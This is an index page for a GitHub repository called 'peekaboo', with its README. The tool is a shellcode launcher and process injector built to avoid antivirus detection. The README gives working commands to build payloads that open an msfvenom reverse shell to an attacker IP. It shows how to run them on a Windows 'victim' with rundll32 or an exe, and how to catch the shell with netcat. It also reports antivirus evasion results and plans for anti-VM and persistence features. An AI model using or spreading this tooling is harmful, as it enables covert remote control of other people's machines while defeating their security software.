Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/cocomelonc/peekaboo
Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.
https://github.com/cocomelonc/peekaboo
aes cpp cryptography encryption injection injector malware-development obfuscation pe-files shellcode xor
Last synced: 1 day ago
JSON representation
Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.
- Host: GitHub
- URL: https://github.com/cocomelonc/peekaboo
- Owner: cocomelonc
- Created: 2021-07-21T17:37:41.000Z (over 3 years ago)
- Default Branch: master
- Last Pushed: 2024-10-24T07:56:20.000Z (3 months ago)
- Last Synced: 2025-01-15T12:53:35.087Z (8 days ago)
- Topics: aes, cpp, cryptography, encryption, injection, injector, malware-development, obfuscation, pe-files, shellcode, xor
- Language: C++
- Homepage:
- Size: 4.36 MB
- Stars: 234
- Watchers: 5
- Forks: 40
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Peekaboo
Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.
## Main logic
XOR encryption and decryption for functions call and main payload - `msfvenom` reverse shell as example.
## Usage
## 1. DLL
### on attacker machine
check your IP:
```bash
ip a
```
run python script with flags:
```bash
python3 peekaboo.py -l 192.168.56.1 -p 4444 --build 1
```
### then on victim machine (windows 10 x64):
run on powershell or cmd promt:
```cmd
rundll32 .\peekaboo.dll, lCiSdbvIAaeZLHFfkUhEcbOy
```
### check on attacker machine:
check your netcat listener:
## 2.Injector
### on attacker machine:
check attacker ip:
```bash
ip a
```
run python script on linux (for example process `mspaint.exe`):
```bash
python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe --build 2
```
### then on victim machine run (windows 10 x64):
```cmd
.\peekaboo.exe
```
or click (if `-m windows` param)
### check on attacker machine:
check your netcat listener:
## 3. NT API injector
run python script on linux (for example process `mspaint.exe`):
```bash
python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe -m console --build 3
```
### then on victim machine (windows 10 x64):
```cmd
.\peekaboo.exe
```
## Issues.
Tested on:
1. Attacker machines: Kali linux 2020.1, Windows 10 x64
2. Victim machine: Windows 7 x64, Windows 10 x64
3. Payload: windows x64 reverse shell from msfvenom
4. AV Engines: Kaspersky, Windows Defender, Norton Antivirus Plus
## virus total result:
02 september 2021
[https://www.virustotal.com/gui/file/c930b9aeab693d36c68e7bcf6353c7515b8fffc8f9a9233e49e90da49ab5d470/detection](https://www.virustotal.com/gui/file/c930b9aeab693d36c68e7bcf6353c7515b8fffc8f9a9233e49e90da49ab5d470/detection)
30 december 2021 (NT API injector)
[https://www.virustotal.com/gui/file/743f50e92c6ef48d6514e0ce2a255165f83afb1ae66deefd68dac50d80748e55/detection](https://www.virustotal.com/gui/file/743f50e92c6ef48d6514e0ce2a255165f83afb1ae66deefd68dac50d80748e55/detection)
## antiscan.me result:
11 january 2022 (NT API injector)
[https://antiscan.me/scan/new/result?id=rQVfQhoFYgH9](https://antiscan.me/scan/new/result?id=rQVfQhoFYgH9)
## websec.nl scanner result:
10 October 2024
[https://websec.net/scanner/result/a3583316-cb72-4894-bd22-48241ca79db9](https://websec.net/scanner/result/a3583316-cb72-4894-bd22-48241ca79db9)
## TODO
- [x] Compile injector in Kali linux
- [x] XOR + AES [aes branch](https://github.com/cocomelonc/peekaboo/tree/aes)
- [x] Calling Windows API functions by hash names
- [x] Find Kernel32 base via asm style
- [x] One python builder
- [ ] Anti-VM tricks
- [ ] Persistence via Windows Registry run keys
- [ ] Replace msfvenom shell to donut payload???
## Attention
This tool is a Proof of Concept and is for Educational Purposes Only!!! Author takes no responsibility of any damage you cause
## License
[MIT](https://choosealicense.com/licenses/mit/)